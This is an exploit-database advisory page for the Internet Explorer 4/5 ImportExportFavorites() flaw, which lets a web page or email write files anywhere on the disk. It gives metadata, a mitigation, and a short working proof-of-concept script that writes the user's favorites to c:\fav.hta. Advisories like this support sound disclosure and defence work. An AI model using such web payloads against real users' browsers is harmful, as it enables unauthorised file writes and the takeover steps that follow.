header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Import/Export Favorites Vulnerability
264
CWE
Product Name: Internet Explorer
Affected Version From: 4.0.1
Affected Version To: 5
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 98, Windows NT 4, Windows 2000, Windows 95
2001

Microsoft Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Import/Export Favorites Vulnerability

The ImportExportFavorites() method, used to import and export favorites to/from a file in IE5, can be made to write to any file on the system, in some cases from an email or remote webpage. This will create a file in the root of C: containing the user's favorites.

Mitigation:

Disable the Import/Export Favorites feature in Internet Explorer.
Source

Exploit-DB raw data:

Microsoft Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Import/Export Favorites Vulnerability

source: https://www.securityfocus.com/bid/627/info

The ImportExportFavorites() method, used to import and export favorites to/from a file in IE5, can be made to write to any file on the system, in some cases from an email or remote webpage.

This will create a file in the root of C: containing the user's favorites.
<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>

Navigation

Suggest Exploit

Services By CQR